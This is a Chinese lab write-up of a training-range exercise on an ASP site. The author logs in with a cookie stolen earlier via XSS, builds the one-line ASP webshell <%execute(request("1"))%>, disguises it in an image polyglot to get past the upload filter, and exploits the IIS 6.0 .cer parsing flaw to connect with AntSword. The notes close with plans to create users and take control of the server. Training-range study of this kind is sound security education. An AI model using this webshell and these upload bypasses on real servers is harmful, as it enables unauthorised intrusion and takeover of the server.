未知攻,何知守。

进行网络安全实践操作时,必须遵守网络安全法。

网络安全法全文(必看)https://zhuanlan.zhihu.com/p/27336286

以下过程均为靶场进行。

什么是中间件?

中间件(Middleware)是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通。中间件处在操作系统和更高一级应用程序之间;我们可以理解为:是一类能够为一种或多种应用程序合作互通、资源共享,同时还能够为该应用程序提供相关的服务的软件。

首先要了解中间件的类型:

主要有IIS、Apache、Nginx、Tomcat、shiro、WebLogic以及其它类型。

以上类型的介绍:基础知识篇 | 应急响应之中间件漏洞

文件上传的作用:

获取目标服务器的权限,进而控制目标服务器。

任务如下:

点击传送门结果如下图 :

1、首先使用之前XSS打到的cookie进行身份位置,登录目标后台。

cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

ADMINSESSIONIDCSTRCSDQ是cookie的名称,LBMLMBCCNPFINOANFGLPCFBC是cookie的值。

打开浏览器设置,进入Web开发者模式,进入存储修改cookie,把名称和值填入,点击准备好了吗? 进入目标后台:

进入目标后台之后,寻找可以进行上webshell(后门)的地方。一般来说,上传图片(头像),上传文件是比较简单且常用的方法。

找到产品管理的产品类别,进行修改产品的图片,上传我们的webshell。 

制作我们的一句话:由于是网站是ASP,我们百度搜索ASP一句话,进行木马的制作。

asp一句话:<%execute(request("1"))%>(密码是1)

我们制作1.asp文件(创建txt文档,把搜索到的一句话进行粘贴,修改后缀为.asp),最简单的一句话木马就制作完成了。

2、进行文件的上传

发现文件上传存在过滤:

我们尝试制作图片码进行绕过(因为图片码后缀符合要求),随便找一个图片(名称为2.jpg),和我们的1.asp文件放在同一个文件夹,在文件上方输入cmd,出现命令控制行,输入copy 2.jpg /b + 1.asp /a 12.jpg

图片码制作完成后,继续进行文件上传(上传的是我们制作的12.jpg图片码): 

打开远程连接工具,进行连接,例如:菜刀,蚁剑等,本次使用蚁剑。

4、右键点击空白处,添加数据

输入网址为 http://dl9k8005.ia.aqlab.cn/UploadFiles/202283115243633.jpg(后面的202283115243633.jpg每次上传都是不一样的,我们上传图片是文件上传的根目录,所以网址是这个)

进行添加,密码为:1(之前一句话设置的),asp类型。

添加成功:

尝试连接,出现如下报错(405),这是因为jpg文件不解析,后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。

 注意:把文件后缀修改为cer时,内容只有一句话,文件太小,会出现无法上传的情况,我们以记事本方式打开,随便添加内容,大小为2-3KB左右时即可上传成功。

文件上传成功,我们修改URL并进行保存:

添加成功进行连接:

完成靶场要求:

总结:

1、明白cookie的概念,会修改cookie;

2、进入后台要知道找到文件上传的地方或者其它可以留后门的途径;

3、上传后门文件的方法;

要解决的问题:

1、上传文件时,文件被过滤了如何解决?

      修改合适的格式进行上传,例如图片码;

      或者:1.asp;.jpg

2、文件上传成功后如何连接?

      连接路径应该是:上传文件的路径

3、连接报错怎么解决?

      使用搜索引擎解决;

例如出现报错有:{}   一般是密码错误 或者修改一句话就可以解决(本次我就遇到了这个问题)

4、如何隐藏上传的后门?

      正在学习;

5、完成以上工作后,下一步干嘛?

      找到cmd.exe运行,创建用户,进行远程登录尝试控制该服务器,没有权限就自己上传cmd.exe文件。   

免责声明:

以上内容为学习记录,如有错误欢迎指正。

本文章内所有工具、技术 仅限于封神台靶场使用,请勿用于未授权的违法攻击!! 用户滥用造成的一切后果自负!! 使用者请务必遵守当地法律!!                             

推荐文章

评论可见,请评论后查看内容,谢谢!!!评论后请刷新页面。